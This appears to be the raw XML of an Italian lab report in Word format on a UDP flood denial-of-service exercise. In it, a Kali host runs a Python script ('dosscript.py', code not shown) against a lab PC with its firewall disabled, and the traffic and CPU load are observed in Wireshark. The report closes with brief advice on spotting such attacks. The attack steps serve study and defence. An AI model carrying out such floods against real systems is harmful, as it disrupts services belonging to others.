        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>num_packets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5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79A4523" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29272B34" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F2C9DD" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415619E6" w14:textId="16420EFE" w:rsidR="00F13935" w:rsidRPr="00F13935" w:rsidRDefault="00F13935" w:rsidP="00F13935">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13935">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PRIMA DELL’ATTACCO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79712D1D" w14:textId="0C1FF712" w:rsidR="002329C5" w:rsidRDefault="00F13935" w:rsidP="00F13935">
      <w:r w:rsidRPr="00F13935">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Per iniziare disattiveremo i firewall del dispositivo attaccato, in questo casa sarà il nostro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.138</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A17C335" w14:textId="0149A9F9" w:rsidR="00F13935" w:rsidRDefault="00F13935" w:rsidP="00F13935">
      <w:r>
        <w:t xml:space="preserve">#Apriremo il programma </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A470E0F" w14:textId="0173F664" w:rsidR="00F13935" w:rsidRPr="00F13935" w:rsidRDefault="00F13935" w:rsidP="00F13935">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t># Apriremo la “ gestione delle attività “ per vedere la CPU come si comporterà</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23206708" w14:textId="586605F6" w:rsidR="002329C5" w:rsidRDefault="00F13935" w:rsidP="00F13935">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="002329C5">
        <w:t xml:space="preserve">Dopo aver scritto lo script lo salviamo sul text editor e lo salveremo con il nome </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131F8E11" w14:textId="77777777" w:rsidR="00F13935" w:rsidRDefault="002329C5" w:rsidP="00F13935">
      <w:r>
        <w:t>“ dosscript.py”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3FFACD" w14:textId="51A3503A" w:rsidR="002329C5" w:rsidRDefault="00F13935" w:rsidP="00F13935">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="002329C5">
        <w:t xml:space="preserve">Apriremo questo file sul </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002329C5">
        <w:t>termiale</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002329C5">
        <w:t xml:space="preserve"> e daremo i comandi “ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002329C5">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002329C5">
        <w:t xml:space="preserve"> dosscript.py”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A986DDF" w14:textId="5F4F0D0E" w:rsidR="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inseriremo i dati che ci vengono richiesti come: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA76F9A" w14:textId="53FD2D7F" w:rsidR="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco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</w:t>
      </w:r>
      <w:r w:rsidR="00F13935">
        <w:t>target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A69288" w14:textId="4706A22A" w:rsidR="00F13935" w:rsidRDefault="00F13935" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>N porta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A485EA2" w14:textId="77777777" w:rsidR="00F13935" w:rsidRDefault="00F13935" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">N pacchetti da inviare </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D034151" w14:textId="77777777" w:rsidR="00F13935" w:rsidRDefault="00F13935" w:rsidP="00F13935"/>
    <w:p w14:paraId="321DFBFB" w14:textId="463F14B9" w:rsidR="00F13935" w:rsidRDefault="00F13935" w:rsidP="00F13935">
      <w:r>
        <w:t xml:space="preserve">Mettendo le varie pagine a confronto avremo questa situazione, la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che lavora al suo ritmo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nosmale</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avremo impostato l’attacco sul terminale, e su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vedremo il traffico che c’è normalmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122B8FA" w14:textId="77777777" w:rsidR="00F13935" w:rsidRDefault="00F13935" w:rsidP="00F13935"/>
    <w:p w14:paraId="5046B445" w14:textId="7171EAC4" w:rsidR="00F13935" w:rsidRDefault="00F13935" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco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E1F8E4" wp14:editId="570041CE">
            <wp:extent cx="6109970" cy="3519170"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
            <wp:docPr id="5587831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169D" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FAA4C9F" w14:textId="77777777" w:rsidR="00F13935" w:rsidRDefault="00F13935">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2270D8" w14:textId="280B60EC" w:rsidR="00F13935" w:rsidRDefault="00F13935" w:rsidP="00F13935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 xml:space="preserve">DOPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13935">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">L’ATTACCO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B21AD2" w14:textId="4A42DB54" w:rsidR="00684B0C" w:rsidRDefault="00684B0C" w:rsidP="00F13935">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sul terminale di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vedremo come l’attacco sia terminato ( avremo potuto mettere anche infiniti pacchetti ) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B7C8E" w14:textId="718AC4C3" w:rsidR="00F13935" w:rsidRDefault="00684B0C" w:rsidP="00F13935">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedremo </w:t>
      </w:r>
      <w:r w:rsidR="00F13935" w:rsidRPr="00F13935">
        <w:t xml:space="preserve">come la </w:t>
      </w:r>
      <w:r w:rsidR="00F13935">
        <w:t>CPU si è alzata perché sta elaborando molti pacchetti che gli stanno arrivando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con un utilizzo del 30% quando prima si aggirava intorno al 19% ed il relativo sbalzo del grafico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F8807" w14:textId="1FDABBE6" w:rsidR="00F13935" w:rsidRPr="00F13935" w:rsidRDefault="00684B0C" w:rsidP="00F13935">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> potremmo vedere come stiamo ricevendo tantissimi pacchetti dall’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attaccante ( quindi da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.115 ) con protocollo UDP alla porta 80 al nostro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.138</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E7A91" w14:textId="77777777" w:rsidR="00F13935" w:rsidRDefault="00F13935">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E0CD63" w14:textId="77777777" w:rsidR="00F13935" w:rsidRDefault="00F13935">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D19610C" w14:textId="77777777" w:rsidR="00F13935" w:rsidRDefault="00F13935">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E67464B" w14:textId="5E1CBB2B" w:rsidR="00F13935" w:rsidRDefault="00F1393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6140A43" wp14:editId="485098BC">
            <wp:extent cx="6116955" cy="3338830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47982280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07C4" w14:textId="77777777" w:rsidR="00684B0C" w:rsidRDefault="00684B0C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA3835F" w14:textId="77777777" w:rsidR="00684B0C" w:rsidRDefault="00684B0C">
      <w:r>
        <w:t xml:space="preserve">Un tecnico della sicurezza nella sua azienda può vedere da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> come stia sotto accatto vedendo una situazione  del genere, ricevendo tantissimi pacchetti perché sotto attacco </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8914CB" w14:textId="77777777" w:rsidR="00684B0C" w:rsidRDefault="00684B0C">
      <w:r>
        <w:t>Dovrà in poco tempo capire se l’attacco quindi proviene dall’esterno e dall’interno della sua azienda e se l’attacco è volontario o involontario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8FFE6D" w14:textId="77777777" w:rsidR="00684B0C" w:rsidRDefault="00684B0C"/>
    <w:p w14:paraId="1C086729" w14:textId="2D96DEAE" w:rsidR="00684B0C" w:rsidRPr="004F2D61" w:rsidRDefault="00684B0C">
      <w:r>
        <w:t>Come linee guida possiamo tenere il fatto di vedere il protocollo per capire se l’attacco è interno o esterno e vedere l’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dell’attaccante</w:t>
      </w:r>
      <w:r w:rsidR="004F2D61">
        <w:t xml:space="preserve"> per capire se è volontario o involontario</w:t>
      </w:r>
      <w:r>
        <w:t>, se è un ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dell’azienda probabilmente sarà stato involontario</w:t>
      </w:r>
      <w:r w:rsidR="004F2D61">
        <w:t xml:space="preserve"> in quanto può essersi sbagliato,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> se è un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che non riconosciamo allora potremmo dedurre che è volontario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F2D61">
        <w:t>perchè</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> l’attaccante </w:t>
      </w:r>
      <w:r w:rsidR="004F2D61">
        <w:t>sta  volutamente decidendo di nascondere le sue tracce.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00684B0C" w:rsidRPr="004F2D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44416"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FC638B8"/>
    <w:lvl w:ilvl="0" w:tplc="C86417F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21211"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0BA1572"/>
    <w:lvl w:ilvl="0" w:tplc="6F688B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F750D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D529804"/>
    <w:lvl w:ilvl="0" w:tplc="6F688B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82995">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1643923773">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="911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5"/>
    <w:rsid w:val="002329C5"/>
    <w:rsid w:val="002E0C2F"/>
    <w:rsid w:val="004F2D61"/>
    <w:rsid w:val="00684B0C"/>
    <w:rsid w:val="006C2D47"/>
    <w:rsid w:val="00881FEF"/>
    <w:rsid w:val="00F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4B97"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E67533C9-B5EC-434E-ADCF-70037594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2329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2329C5"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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23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2024-11-07T14:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-07T14:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>